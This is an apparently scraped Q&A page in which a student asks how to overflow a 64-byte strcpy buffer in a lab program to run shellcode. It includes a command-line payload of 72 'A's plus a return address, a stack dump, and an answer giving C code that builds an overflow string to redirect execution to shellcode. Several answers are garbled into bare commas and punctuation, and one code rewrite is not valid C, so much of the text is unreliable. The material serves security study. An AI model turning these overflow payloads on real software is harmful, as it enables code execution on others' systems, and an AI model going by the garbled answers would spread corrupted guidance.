Geek asks and answers

Using buffer overflows to execute shell code

Recently, I have been studying computer security and have come across several problems, and I have problems with this in particular.

I am provided with a fixed buffer function that I need to overflow in order to execute shellcode in the file shellcode. The function is pretty simple:

void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    //function provided to display stack on command prompt
    dump_stack((void **) buf, 21, (void **) &str);
}

My initial assumption was to change the return address, eip, function to find and execute what is in the shellcode file, but I realized that I do not have an address for the file that I can represent in hexadecimal value. I'm pretty sure I need to manipulate the return address, so currently I'm calling:

//the string is passed as a command line arg
./buffer_overflow_shellcode $(python -c "print 'A'*72 + '\x41\xd6\xff\xff' ")

my conclusion:

Stack dump:
0xffffd600: 0xffffd7fd (first argument)
0xffffd5fc: 0x08048653 (saved eip)
0xffffd5f8: 0xffffd641 (saved ebp)
0xffffd5f4: 0x41414141
0xffffd5f0: 0x41414141
0xffffd5ec: 0x41414141
0xffffd5e8: 0x41414141
0xffffd5e4: 0x41414141
0xffffd5e0: 0x41414141
0xffffd5dc: 0x41414141
0xffffd5d8: 0x41414141
0xffffd5d4: 0x41414141
0xffffd5d0: 0x41414141
0xffffd5cc: 0x41414141
0xffffd5c8: 0x41414141
0xffffd5c4: 0x41414141
0xffffd5c0: 0x41414141
0xffffd5bc: 0x41414141
0xffffd5b8: 0x41414141
0xffffd5b4: 0x41414141
0xffffd5b0: 0x41414141 (beginning of buffer)
Segmentation fault

python script 72 A edp eip , edp , . , !

+5
4

, , , : . objdump . -, gdb, . , ( , ).

pdf, . .

, . ( , ). , this post , .

+12

, , eip, , , shellcode, , , .

RET, , .

(( , -, ( , ), ( ), , .))

, RET . , . ?

, - :

char shellcode[] = "\x90\x90\x90...";


int main()
{
        /* 
         * huge string (like your 72 A's) that appends the address of the 
         * shellcode at the right address (in your case I think it 64 + 4) 
         */
        char evilstring[100]; 

        /* Fill the buf and the EBP with A */
        for (int i = 0; i < 64 + 4; i++) {
                evilstring[i] = 'A';
        }
        /* And the RET with the address of your shellcode */
        sprintf(&evilstring[68], "%p", &shellcode[0]);
        vuln(evilstring);
        /* you should have a shell now */

        /* NOTREACHED */
        return 0;
}

, , shellcode [] . , . ( - , ).

, , .

, , .

+2
char buff[20];
unsigned int pass = 0;

when "buff" overflows, the auxiliary input turns "pass" into a value greater than 0, making it a "true" value.

+1
source

It's not difficult when you know where they look, too, as said before opening the w / gdb application. run it. Then I (nfo) r (egisters) to understand why it crashed. disassembly is also very useful.

Also, (suppose you know that):

void vuln(char *str) {
    char buf[64];
    strcpy(buf, str);
    //function provided to display stack on command prompt
    dump_stack((void **) buf, 21, (void **) &str);
}

in fact

void vuln(char *str) {
    void *return;
    char buf[64];

    /* Set Return value and store stack */
    strcpy(buf, str);
    //function provided to display stack on command prompt
    dump_stack((void **) buf, 21, (void **) &str);
    /* restore stack and jmp to return value. */
}
0
source

More articles:


All Articles